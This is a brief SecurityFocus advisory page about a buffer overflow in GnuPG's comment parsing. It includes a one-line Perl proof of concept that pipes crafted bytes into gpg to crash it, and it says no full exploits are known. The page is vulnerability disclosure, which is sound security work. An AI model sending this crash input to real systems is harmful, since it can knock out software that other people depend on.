GnuPG Parse_Comment Remote Buffer Overflow Vulnerability

The following Perl command demonstrates this issue by crashing the affected application:

perl -e 'print "\xfd\xff\xff\xff\xff\xfe"'| /var/gnupg/bin/gpg --no-armor

Currently we are not aware of any exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.


 

Privacy Statement
Copyright 2010, SecurityFocus